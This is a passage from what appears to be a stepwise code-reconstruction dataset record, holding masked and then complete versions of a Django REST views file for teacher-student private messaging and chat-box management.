& Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 
'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return 
Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-2": "<mask token>\n\n\nclass closeChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass openChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass searchContactView(APIView):\n\n def get(self, request, 
*args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 
'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = 
ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 
200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return 
Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-3": "<mask token>\n\n\nclass enterPrivateLetterView(APIView):\n <mask token>\n\n\nclass getRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderTea_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverTea_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass closeChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) 
& Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass openChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass searchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n 
iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': 
str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n 
privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = 
request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == 
'1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-4": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom ex.models import Teacher, Student, Group, Report, TeamEvaluation, PrivateLetter, ChatBoxIsOpen\nfrom django.core import serializers\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth.hashers import make_password, check_password\nimport os\nfrom ex.utils.jwt_auth import create_token, get_user_id\nfrom ex.utils.extensions.auth import JwtQueryParamAuthentication\nfrom django.db.models import Q\n\n\nclass getPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverTea_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 
